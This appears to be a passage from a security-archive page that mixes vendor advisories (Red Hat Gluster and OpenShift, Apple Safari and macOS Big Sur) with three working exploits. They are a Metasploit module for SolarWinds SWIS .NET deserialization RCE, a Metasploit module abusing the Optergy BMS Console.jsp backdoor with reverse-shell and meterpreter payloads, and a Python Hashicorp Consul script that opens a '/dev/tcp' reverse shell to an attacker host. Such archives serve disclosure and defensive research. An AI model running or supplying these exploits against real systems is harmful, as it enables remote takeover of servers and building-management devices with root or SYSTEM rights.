The SolarWinds Information Service (SWIS) is vulnerable to remote code execution by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/amqp/version_0_9_1'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  def initialize    super(      'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',      'Description' => %q{        The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the        AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted        message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.      },      'Author' => [        'Justin Hong', # vulnerability research, Trend Micro        'Lucas Miller', # vulnerability research, Trend Micro        'Piotr Bazydło', # vulnerability discovery, reported to ZDI        'Spencer McIntyre' # metasploit module      ],      'Arch' => ARCH_CMD,      'Platform' => 'win',      'References' => [        [ 'CVE', '2022-38108' ],        [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],        [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]      ],      'DefaultOptions' => {        'WfsDelay' => 10      },      'Targets' => [        [ 'Automatic', {} ]      ],      'DefaultTarget' => 0,      'Privileged' => true,      'DisclosureDate' => '2022-10-19',      'Notes' => {        'Stability' => [CRASH_SAFE],        'Reliability' => [REPEATABLE_SESSION],        'SideEffects' => [IOC_IN_LOGS]      }    )    register_options([      Opt::RHOST,      Opt::RPORT(5671),      OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),      OptString.new('PASSWORD', [true, 'The password to authenticate with', ''])    ])    register_advanced_options(      [        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),        Opt::SSLVersion      ]    )  end  def peer    rhost = datastore['RHOST']    rport = datastore['RPORT']    if Rex::Socket.is_ipv6?(rhost)      "[#{rhost}]:#{rport}"    else      "#{rhost}:#{rport}"    end  end  def print_status(msg)    msg = "#{peer} - #{msg}"    super  end  def exploit    amqp_client = Rex::Proto::Amqp::Version091::Client.new(      datastore['RHOST'],      port: datastore['RPORT'],      context: { 'Msf' => framework, 'MsfExploit' => self },      ssl: datastore['SSL'],      ssl_version: datastore['SSLVersion']    )    unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])      fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")    end    print_status('Successfully connected to the remote server.')    channel = amqp_client.channel_open    vprint_status('Successfully opened a new channel.')    channel.basic_publish(      routing_key: 'SwisPubSub',      message: ::Msf::Util::DotNetDeserialization.generate(        payload.encoded,        gadget_chain: :ObjectDataProvider,        formatter: :JsonNetFormatter      ),      properties: {        message_type: 'System.Windows.Data.ObjectDataProvider'      }    )    print_status('Successfully published the message to the channel.')    channel.close    amqp_client.connection_close  rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e    fail_with(Failure::UnexpectedReply, e.message)  rescue Rex::Proto::Amqp::Error::AmqpError => e    fail_with(Failure::Unknown, e.message)  ensure    amqp_client.close  endend

SolarWinds Information Service (SWIS) Remote Command Execution

Red Hat Security Advisory 2023-1486-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Issues addressed include HTTP request smuggling, code execution, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Gluster Storage web-admin-build security update  
Advisory ID:       RHSA-2023:1486-01  
Product:           Red Hat Gluster Storage  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1486  
Issue date:        2023-03-28  
CVE Names:         CVE-2022-24790 CVE-2022-30122 CVE-2022-30123   
                   CVE-2022-31129 CVE-2022-31163   
=====================================================================

1. Summary:

An update is now available for Red Hat Gluster Storage 3.5 for RHEL 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Gluster 3.5 Web Administration on RHEL-7 - noarch, x86_64

3. Description:

Grafana is an open source, feature rich metrics dashboard and graph editor  
for Graphite, InfluxDB & OpenTSDB.

Django is a high-level Python Web framework that encourages rapid  
development and a clean, pragmatic design. It focuses on automating as much  
as possible and adhering to the DRY (Don't Repeat Yourself) principle.

Ruby is an extensible, interpreted, object-oriented, scripting language. It  
has features to process text files and to perform system management tasks.

Security Fix(es):

* puma-5.6.4: http request smuggling vulnerabilities (CVE-2022-24790)

* rubygem-rack: crafted requests can cause shell escape sequences  
(CVE-2022-30123)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* rubygem-tzinfo: arbitrary code execution (CVE-2022-31163)

* rubygem-rack: crafted multipart POST request may cause a DoS  
(CVE-2022-30122)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2071616 - CVE-2022-24790 puma-5.6.4: http request smuggling vulnerabilities  
2099519 - CVE-2022-30122 rubygem-rack: crafted multipart POST request may cause a DoS  
2099524 - CVE-2022-30123 rubygem-rack: crafted requests can cause shell escape sequences  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2110551 - CVE-2022-31163 rubygem-tzinfo: arbitrary code execution

6. Package List:

Red Hat Gluster 3.5 Web Administration on RHEL-7:

Source:  
grafana-5.2.4-6.el7rhgs.src.rpm  
python-django-1.11.27-4.el7rhgs.src.rpm  
ruby-2.4.9-94.el7rhgs.src.rpm  
rubygem-activemodel-5.2.0-1.el7rhgs.src.rpm  
rubygem-activesupport-5.2.0-1.el7rhgs.src.rpm  
rubygem-bcrypt-3.1.12-2.el7rhgs.src.rpm  
rubygem-concurrent-ruby-1.1.9-1.el7rhgs.src.rpm  
rubygem-i18n-1.9.1-1.el7rhgs.src.rpm  
rubygem-mustermann-1.0.3-1.el7rhgs.src.rpm  
rubygem-nio4r-2.3.1-2.el7rhgs.src.rpm  
rubygem-puma-4.3.12-1.el7rhgs.src.rpm  
rubygem-rack-2.2.4-1.el7rhgs.src.rpm  
rubygem-rack-protection-2.2.0-1.el7rhgs.src.rpm  
rubygem-sinatra-2.2.0-1.el7rhgs.src.rpm  
rubygem-thread_safe-0.3.6-1.el7rhgs.src.rpm  
rubygem-tilt-2.0.11-1.el7rhgs.src.rpm  
rubygem-tzinfo-1.2.10-1.el7rhgs.src.rpm

noarch:  
python-django-bash-completion-1.11.27-4.el7rhgs.noarch.rpm  
python2-django-1.11.27-4.el7rhgs.noarch.rpm  
python2-django-doc-1.11.27-4.el7rhgs.noarch.rpm  
ruby-doc-2.4.9-94.el7rhgs.noarch.rpm  
ruby-irb-2.4.9-94.el7rhgs.noarch.rpm  
rubygem-activemodel-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-activemodel-doc-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-activesupport-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-activesupport-doc-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-bcrypt-doc-3.1.12-2.el7rhgs.noarch.rpm  
rubygem-concurrent-ruby-1.1.9-1.el7rhgs.noarch.rpm  
rubygem-concurrent-ruby-doc-1.1.9-1.el7rhgs.noarch.rpm  
rubygem-i18n-1.9.1-1.el7rhgs.noarch.rpm  
rubygem-i18n-doc-1.9.1-1.el7rhgs.noarch.rpm  
rubygem-minitest-5.10.1-94.el7rhgs.noarch.rpm  
rubygem-mustermann-1.0.3-1.el7rhgs.noarch.rpm  
rubygem-mustermann-doc-1.0.3-1.el7rhgs.noarch.rpm  
rubygem-nio4r-doc-2.3.1-2.el7rhgs.noarch.rpm  
rubygem-power_assert-0.4.1-94.el7rhgs.noarch.rpm  
rubygem-puma-doc-4.3.12-1.el7rhgs.noarch.rpm  
rubygem-rack-2.2.4-1.el7rhgs.noarch.rpm  
rubygem-rack-doc-2.2.4-1.el7rhgs.noarch.rpm  
rubygem-rack-protection-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-rack-protection-doc-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-rake-12.0.0-94.el7rhgs.noarch.rpm  
rubygem-rdoc-5.0.1-94.el7rhgs.noarch.rpm  
rubygem-sinatra-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-sinatra-doc-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-test-unit-3.2.3-94.el7rhgs.noarch.rpm  
rubygem-thread_safe-0.3.6-1.el7rhgs.noarch.rpm  
rubygem-thread_safe-doc-0.3.6-1.el7rhgs.noarch.rpm  
rubygem-tilt-2.0.11-1.el7rhgs.noarch.rpm  
rubygem-tilt-doc-2.0.11-1.el7rhgs.noarch.rpm  
rubygem-tzinfo-1.2.10-1.el7rhgs.noarch.rpm  
rubygem-tzinfo-doc-1.2.10-1.el7rhgs.noarch.rpm  
rubygem-xmlrpc-0.2.1-94.el7rhgs.noarch.rpm  
rubygems-2.6.14.4-94.el7rhgs.noarch.rpm  
rubygems-devel-2.6.14.4-94.el7rhgs.noarch.rpm

x86_64:  
grafana-5.2.4-6.el7rhgs.x86_64.rpm  
ruby-2.4.9-94.el7rhgs.x86_64.rpm  
ruby-debuginfo-2.4.9-94.el7rhgs.x86_64.rpm  
ruby-devel-2.4.9-94.el7rhgs.x86_64.rpm  
ruby-libs-2.4.9-94.el7rhgs.x86_64.rpm  
rubygem-bcrypt-3.1.12-2.el7rhgs.x86_64.rpm  
rubygem-bcrypt-debuginfo-3.1.12-2.el7rhgs.x86_64.rpm  
rubygem-bigdecimal-1.3.2-94.el7rhgs.x86_64.rpm  
rubygem-did_you_mean-1.1.0-94.el7rhgs.x86_64.rpm  
rubygem-io-console-0.4.6-94.el7rhgs.x86_64.rpm  
rubygem-json-2.0.4-94.el7rhgs.x86_64.rpm  
rubygem-net-telnet-0.1.1-94.el7rhgs.x86_64.rpm  
rubygem-nio4r-2.3.1-2.el7rhgs.x86_64.rpm  
rubygem-nio4r-debuginfo-2.3.1-2.el7rhgs.x86_64.rpm  
rubygem-openssl-2.0.9-94.el7rhgs.x86_64.rpm  
rubygem-psych-2.2.2-94.el7rhgs.x86_64.rpm  
rubygem-puma-4.3.12-1.el7rhgs.x86_64.rpm  
rubygem-puma-debuginfo-4.3.12-1.el7rhgs.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-24790  
https://access.redhat.com/security/cve/CVE-2022-30122  
https://access.redhat.com/security/cve/CVE-2022-30123  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-31163  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCJbr9zjgjWX9erEAQjn5RAAoUF/k8EPq7iO9+x35TIISMUb+zNQON1F  
iM5r74vbqDjgB7HjNBJptdMj25UA+gOqrzl2UfpWpw5QZlPpnr3nCEcHrq1qKHHt  
IT7cZUWdvp1Gz+e0OtSPHDvmSlS/Wko1ElsH4i5SZayl+K9V7DJjShd0KJGpK9F4  
grBeCjGqGr9Yl2QVAjrKLtWg4JGzbKO0WNJ+vs5XaN3SToCy534sIsRTkH2/JMcG  
B9yQPQ0uQ6p6GBzPNWwReZngACEgEVIVwyFFVuEEbli7b5d5qzRCSFycrp8qqlGd  
HGYVRXIk8pWnzq/Ex99Rv9ni3zQlwBkBWeQxko30NfTZAS5mS94n66+dJc6Ynxhr  
yQo/WHGd4OlHlBt4d3HTLfgl0O9Fwz60B/o8MWHf+FkR/byxOiPbLPuNZekCXNEP  
jVGnFw46osRgBjw2qerUuftnMLi9NY6+SoaEfRTjaQSxC+wv+9gUmgKkOSKgK3xr  
ThraNkkupLwWNA+AsIQGlGwfPHKyAbP3qr6yCulFB4fKb9btOprq7b+cxGhZt5ql  
R7NFlVZuMg6uTnb+YXAOoAsLzWQJpZiOXO8g3B3UhQcjqamgo/7Rr62n4kFDslfN  
HDWP2/GJeYe7A3DlfRawVi5zAFa5HCSDdsZUjvFa67cwv/3H2jgnFg4kSBj6yb3P  
dK9wE3y07no=  
=kXpV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1486-01

Red Hat Security Advisory 2023-1409-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.9.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.9 security update  
Advisory ID:       RHSA-2023:1409-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1409  
Issue date:        2023-03-27  
CVE Names:         CVE-2021-20329 CVE-2023-0767   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.12.9 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.9. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:1408

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* mongo-go-driver: specific cstrings input may not be properly validated  
(CVE-2021-20329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

(For x86_64 architecture)  
The image digest is  
sha256:96bf74ce789ccb22391deea98e0c5050c41b67cc17defbb38089d32226dba0b8

(For s390x architecture)  
The image digest is  
sha256:3212a1f7b5dd35e6fc1821d6479792d615fe7fb987c9c202b8bba6e310cb8234

(For ppc64le architecture)  
The image digest is  
sha256:82afa12a5c172ef53df9a9bb366c64210fdf164b03b1caf56e0f33ef3f2ad4d4

(For aarch64 architecture)  
The image digest is  
sha256:049dda19feec94ab7767e5426a46c24e40e15f8f6a3471f325bfcdd7977f90bb

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1971033 - CVE-2021-20329 mongo-go-driver: specific cstrings input may not be properly validated

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10241 - Backport request for 4.12 version - BZ#2116562  
OCPBUGS-10289 - Broken link for Ansible tagging  
OCPBUGS-10318 - node healthz server is missing in ovnk  
OCPBUGS-10372 - Newly provisioned machines unable to join cluster  
OCPBUGS-10490 - 4.12 cleanup: Move checkForStaleOVSInterfaces and related code to node.go  
OCPBUGS-10496 - [release-4.12] Uploading large layers fails with "blob upload invalid"  
OCPBUGS-10497 - aws: mismatch between RHCOS and AWS SDK regions  
OCPBUGS-10505 - 4.1 born cluster fails to scale-up due to podman run missing `--authfile` flag  
OCPBUGS-10514 - Risk cache warming takes too long on channel changes  
OCPBUGS-10587 - Console shows x509 error when requesting token from oauth endpoint  
OCPBUGS-2439 - "Failed to open directory, disabling udev device properties" in node-exporter logs  
OCPBUGS-6036 - Project dropdown order is not as smart as project list page order  
OCPBUGS-676 - cluster-machine-approver doesn't ignore case for CSR hostnames  
OCPBUGS-7445 - MTU migration configuration is cleaned up prematurely while in progress  
OCPBUGS-7469 - GCP XPN should only be available with Tech Preview  
OCPBUGS-7481 - [gcp][CORS-1988] "create manifests" without an existing "install-config.yaml" missing 4 YAML files in "<install dir>/openshift" which leads to "create cluster" failure  
OCPBUGS-7650 - Redhat-operators are failing regularly due to startup probe timing out which in turn increases CPU/Mem usage on Master nodes  
OCPBUGS-7800 - Project Access tab cannot differentiate between users and groups  
OCPBUGS-8014 - add default noProxy config for Azure  
OCPBUGS-8015 - Azure: VIP 168.63.129.16 should be noProxy to all clouds except Public  
OCPBUGS-8339 - Bug with Red Hat Integration - 3scale - Managed Application Services causes operator-install-single-namespace.spec.ts to fail  
OCPBUGS-9927 - Enable node healthz server for ovnk in CNO 

6. References:

https://access.redhat.com/security/cve/CVE-2021-20329  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCIHbtzjgjWX9erEAQhUUA/9Gb/UzKNSXb8mz2MJed59dfhKaf1y1D+u  
lEkjj+um/vh4GitNMPPhCuilemY1N23xIvsAiljfTwjVuv7J6cAID33d74kkNb1x  
qVvzxEresaSEXsZnjGmM2xwFh9vom5F0Cqs010IyyXSgMuVm2Z253oZVRTTG8YXn  
iroRGCEYHyDQ571z1+7PeZ6EXBEK2WrKymB3k7h8VgMh6dDIDpKwL7TSOlrhTcRO  
zVGHk6MNCfHmRdIExp0kP//wWIO5mA5Jm+cmnhQWq8RbRx0WZngXJSs2rEdKDS92  
57GRjEKszXajxGIw4KDz6GnSjJ4ETCEeRR3LSqcYa5Ba3spxn1cBwECgqbMDyPMj  
Gi6CtnrHw55GgF+XTltZNEEZfPQkuX8YcUm54Oafz+0Aoqw+OShQgdayl/DiIWaa  
XS/HqbOAL+icwopP+JryTdaKKC6X1FwVzMBLsunSrV9eVxn2BeyB6K6EP4pTGGZD  
NXs4CDi1oDSrjo+sjm1y3tB8TTedmqs243jJUvCeS49XJmSPZJ0givjou9elBO6t  
LSxiJCOTl4eBQrEBrBxESJ2zZ0KCV5kDP6LPAnr//yhP3Hq6eSF9zGup6DWmVOsR  
unGUbNl06+8Rm9hsRn8m04S/7EN+Tkwmc6Vbk2ph1amwjzIswLS5oLO3U2XbXuUq  
Ca2Pw33m97k=  
=w+n4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1409-01

Apple Security Advisory 2023-03-27-8 - Safari 16.4 addresses bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-8 Safari 16.4

Safari 16.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213671.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebKit Web Inspector  
We would like to acknowledge Dohyun Lee (@l33d0hyun) and crixer  
(@pwning_me) of SSD Labs for their assistance.

Safari 16.4 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn4ACgkQ4RjMIDke  
NxnzuA//R6r9YrqrgdWro+Why6ihvWKdVIBgEVu93nNfgd34+HLkRKsr00xH0hNw  
kDvjtfPpCeuQB61VtVO6dCEPHLJICqEyOeqHoIDYvKwAoH830u3S4vWA6ozJpBmd  
CCI+5tF9qAZWb+O0ED+hyU31z/+0s+gTGUjp7dhAnKJ6jKQOjSwWG4+YEgJA6wGG  
oOC8dXGTWMHQJsDyxliGC/FQVo6cyWtbZiwWB9QYKP48yIldrRWJz75xOUWYOjWe  
GYZ+vNDaOIi+/YHRHRYf/RY7Fdigur5rsWtzK/0v1T/n3t2kwe6WZkF4HdKFHRXL  
KSw1fogSQh1BncUXlVfkn3BMPoEOUxHkhtawdKkewK+W8ZTC2mq+YwrJ26YZMTmU  
5Nvgua4gxm2gb8LupcaXxt+o/nIbbTWyNx6rEyskWMxw6jZksBwgdDk2pSrUtmWh  
d2VnkbUjoLXbP7uqSrf2gqd6drAVrHUlmEHLVAXCG60mhWNzCxr2M+DG2RZ0RLgJ  
DMy2O4zxdzWZxkRJE86LchYz8zToQD7eQXm3zMQTGdSZoJXr3NxVGwdCaCGdhGAA  
ckJV7nHybrVGQXdo5EeNuxKeiyJMimGGIDpQmHrrf+PgeL7zKi9e4KwyyobAmvZn  
lw86QALA/97AKbSQthqHlDnv+inUrdwH1TWcurtCkjeRHgkhif8=  
=o24C  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-8

This Metasploit module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications. Versions 2.0.3a and below are vulnerable. Attackers can exploit this issue by directly navigating to an undocumented backdoor script called Console.jsp in the tools directory and gain full system access. Successful exploitation results in root command execution using sudo as user optergy.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Optergy Proton and Enterprise BMS Command Injection using a backdoor',        'Description' => %q{          This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise          Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.          Attackers can exploit this issue by directly navigating to an undocumented backdoor script          called Console.jsp in the tools directory and gain full system access.          Successful exploitation results in `root` command execution using `sudo` as user `optergy`.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor          'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery        ],        'References' => [          [ 'CVE', '2019-7276'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],          [ 'URL', 'https://optergy.com/products/proton/' ],          [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],          [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],          [ 'EDB', '47641'],          [ 'PACKETSTORM', '155258']        ],        'DisclosureDate' => '2019-11-05',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'Payload' => { 'BadChars' => "\x20" },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptBool.new('SUDO', [ true, 'Set the sudo option to get root privileges', false ])      ]    )  end  def execute_command(cmd, _opts = {})    # Step 1: get the challenge and compute the response answer for the backdoor execution    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')    })    if res.nil? || (res.code != 200)      return nil    else      # Get and create a challenge response      res_json = res.get_json_document      return nil if res_json.nil? || res_json.blank?      # Get the challenge      challenge = res_json['response']['message']      # Make SHA1 hash from received challenge      h1 = Digest::SHA1.hexdigest challenge      # Make MD5 hash from SHA1 hash      h2 = Digest::MD5.hexdigest h1      # Combine MD5 hash and SHA1 hash as answer (response) to the challenge      answer = h1 + h2    end    # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.    if target['Type'] == :linux_dropper      cmd = cmd.gsub(' ') { '${IFS}' }    end    if datastore['SUDO']      payload = "sudo bash -c #{cmd}"    else      payload = "bash -c #{cmd}"    end    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'command' => payload,        'challenge' => challenge,        'answer' => answer      }    })    if res.nil? || (res.code != 200)      return nil    else      # get result and return the command response      res_json = res.get_json_document      return nil if res_json.nil? || res_json.blank?      res_cmd_output = res_json['response']['message']      return res_cmd_output    end  end  # Checking if the target is vulnerable by executing the whoami command via the backdoor  def check    res = execute_command('whoami')    return Exploit::CheckCode::Safe unless res && (res.chomp == 'root' || res.chomp == 'optergy')    Exploit::CheckCode::Vulnerable  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      res = execute_command(payload.encoded)      fail_with(Failure::PayloadFailed, "#{datastore['PAYLOAD']} failed.") if res.nil?    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager    end  endend

Optergy Proton And Enterprise BMS 2.0.3a Command Injection

Hashicorp Consul version 1.0 suffers from a remote command execution vulnerability.

    # Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)# Date: 26/10/2022# Exploit Author: GatoGamer1155, 0bfxgh0st# Vendor Homepage: https://www.consul.io/# Description: Exploit for gain reverse shell on Remote Command Execution via API# References: https://www.consul.io/api/agent/service.html# Tested on: Ubuntu Server# Software Link: https://github.com/hashicorp/consulimport requests, sysif len(sys.argv) < 6:    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")    exit(1)target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"headers = {"X-Consul-Token": f"{sys.argv[5]}"}json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}try:    requests.put(target, headers=headers, json=json)    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")except:    print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")

Hashicorp Consul 1.0 Remote Command Execution

Apple Security Advisory 2023-03-27-5 - macOS Big Sur 11.7.5 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-5 macOS Big Sur 11.7.5

macOS Big Sur 11.7.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213675.

Apple Neural Engine  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher, Antonio Zekic  
(@antoniozekic), and John Aakerblom (@jaakerblom)

AppleMobileFileIntegrity  
